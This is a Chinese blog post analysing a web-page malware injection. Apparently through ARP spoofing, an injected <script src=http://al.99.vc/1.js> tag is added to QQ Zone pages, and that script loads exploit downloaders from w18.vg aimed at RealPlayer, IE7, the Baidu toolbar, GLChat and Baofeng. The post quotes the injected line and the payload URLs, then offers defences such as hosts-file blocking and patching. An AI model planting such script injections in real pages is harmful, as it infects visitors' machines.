当前位置: 首页 > news >正文

al.99.vc挂马分析与解决建议

al.99.vc挂马分析与解决建议

arp最近似乎有热起来啦。这几天人一多就卡,不是一般的卡,QQ上去倒是没啥问题。就是网页几乎就打不开。巨慢!!

昨晚把机子都检查啦便并且关闭网络恢复系统。早起又中。

名字不一样,其中一个是usrinit.exe,我打算用好的userinit.exe去覆盖中毒的机子。

360arp防火墙打开不时会报警。但没有ip地址只有mac。这种欺骗性的arp用360arp防火墙根本不起作用似的。

因为这个机房我就让这个机子上拉,所以肯定是其他机房也arp啦

打开qq空间已经被挂马啦。

<script src=http://al.99.vc/1.js></script> <html><head><meta http-equiv=”Content-Type” content=”text/html;charset=gb2312″ /><script>var g_Src_Domain=”u.cnc.qzone.qq.com”,g_iUin=27020287,_s_=new Date(),g_JSON=1;</script><script src=”http://u.cnc.qzone.qq.com/cgi-bin/entry_js.cgi?uin=27020287&r=cnc”></script><script src=”http://cnc.imgcache.qq.com/qzone/G4.1.js”></script><script>if (typeof G41Loaded==”undefined”) location=”http://qzone.qq.com/new_help/error.htm”</script><noscript><img src=”http://cnc.imgcache.qq.com/qzone/noscript.gif”></noscript></html>

其他的站打开都没问题。刚发现还以为是腾讯空间有问题呢。急忙让朋友liu测试下没有发现我这情况(红色部分的挂马代码)。所以认为是被其他机房机子arp啦,arp dns!!!

看看放学能不能给别的机房沟通沟通看看。解决问题。

qzone被挂马

al.99.vc/1.js

al.99.vc/1.js内容还原

这个主要是几个“图片”文件(所谓的木马下载者)!

http://w18.vg/real.gif貌似感染real,

http://w18.vg/ms.gif 种ie7

http://w18.vg/baidu.gif

百度bar(百度搜霸)的漏洞利用?

http://w18.vg/x1.gif

http://w18.vg/lz.gif

http://w18.vg/bf.gif

病毒样本-al.99.vc

先留着样本,闲下来在分析。

忙起来啦在说吧

al.99.vc/1.js代码内容截图

解决建议:

修改系统盘:C:\WINDOWS\system32\drivers\etc\host(用记事本打开)文件添加这句可以临时解决再次中这个站的木马病毒

127.0.0.1 al.99.vc

屏蔽这个网站就可以啦

。。。

http://w18.vg/real.gif貌似感染real,如果你有realone建议卸掉或者去官方下载最新的版本装上。如果你看到realone不是有错误提示说明你的realone有漏洞。

http://w18.vg/ms.gif这个貌似只有ie7才会被中上。所以建议你打上最新的ie补丁。

http://w18.vg/baidu.gif百度搜霸的漏洞利用,建议直接卸掉就可以啦。或者升级你的搜霸。
http://w18.vg/x1.gif这个已经为404页啦不清楚是什么

http://w18.vg/lz.gif利用的是glchat的漏洞是一个聊天工具

http://w18.vg/bf.gif暴风影音的漏洞利用,建议去下载新的暴风影音

如果个人机子建议打开病毒实时检测功能。

如果你有更好的建议,谢谢分享。

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 手机html端 悬浮_移动端WEB开发 — 响应式布局
  • ransac算法_【干货】计算机科学中最重要的32个算法 你知道几个?
  • 超轻量级全文搜索框架的设计和实现 (1)
  • 免费的UML建模工具StarUml
  • 游戏设计与开发_上海游戏开发设计培训班制作属于自已的游戏
  • QReader阅读中文文本乱码的解决
  • python数据归一化代码_python 实现对数据集的归一化的方法
  • 《Solaris 红宝书》系列在线课程
  • FCIP基础
  • rs232接口引脚定义_电子设计 | 串口,UART,RS232之间的区别
  • mysql 列合并_第14期:数据页合并
  • ASP.NET之父Scott Guthrie,1月13日做客微软北京.NET俱乐部
  • mysql 统计_分享一个实用的mysql数据库表概要信息统计sql,值得收藏
  • Compile qt-2.3.10
  • python中readlines()_在Python中,read()或readlines()更快吗?
  • JavaScript对象详解
  • Java反射-动态类加载和重新加载
  • JS进阶 - JS 、JS-Web-API与DOM、BOM
  • Mybatis初体验
  • Netty+SpringBoot+FastDFS+Html5实现聊天App(六)
  • node和express搭建代理服务器(源码)
  • PHP 程序员也能做的 Java 开发 30分钟使用 netty 轻松打造一个高性能 websocket 服务...
  • PyCharm搭建GO开发环境(GO语言学习第1课)
  • Python学习之路16-使用API
  • spring-boot List转Page
  • 大数据与云计算学习:数据分析(二)
  • 电商搜索引擎的架构设计和性能优化
  • 关于Flux,Vuex,Redux的思考
  • 猴子数据域名防封接口降低小说被封的风险
  • 基于组件的设计工作流与界面抽象
  • 开源中国专访:Chameleon原理首发,其它跨多端统一框架都是假的?
  • 前端知识点整理(待续)
  • 如何使用Mybatis第三方插件--PageHelper实现分页操作
  • 设计模式 开闭原则
  • 使用 Docker 部署 Spring Boot项目
  • 手写双向链表LinkedList的几个常用功能
  • 微信小程序--------语音识别(前端自己也能玩)
  • 在Docker Swarm上部署Apache Storm:第1部分
  • 数据可视化之下发图实践
  • ​ 无限可能性的探索:Amazon Lightsail轻量应用服务器引领数字化时代创新发展
  • ​​​​​​​Installing ROS on the Raspberry Pi
  • ​LeetCode解法汇总1276. 不浪费原料的汉堡制作方案
  • # 职场生活之道:善于团结
  • #我与Java虚拟机的故事#连载14:挑战高薪面试必看
  • (1)(1.9) MSP (version 4.2)
  • (173)FPGA约束:单周期时序分析或默认时序分析
  • (k8s)kubernetes集群基于Containerd部署
  • (切换多语言)vantUI+vue-i18n进行国际化配置及新增没有的语言包
  • (实战)静默dbca安装创建数据库 --参数说明+举例
  • (转)MVC3 类型“System.Web.Mvc.ModelClientValidationRule”同时存在
  • (总结)Linux下的暴力密码在线破解工具Hydra详解
  • ./configure、make、make install 命令
  • .NET C# 配置 Options
  • .NET CF命令行调试器MDbg入门(四) Attaching to Processes
  • .NET CLR基本术语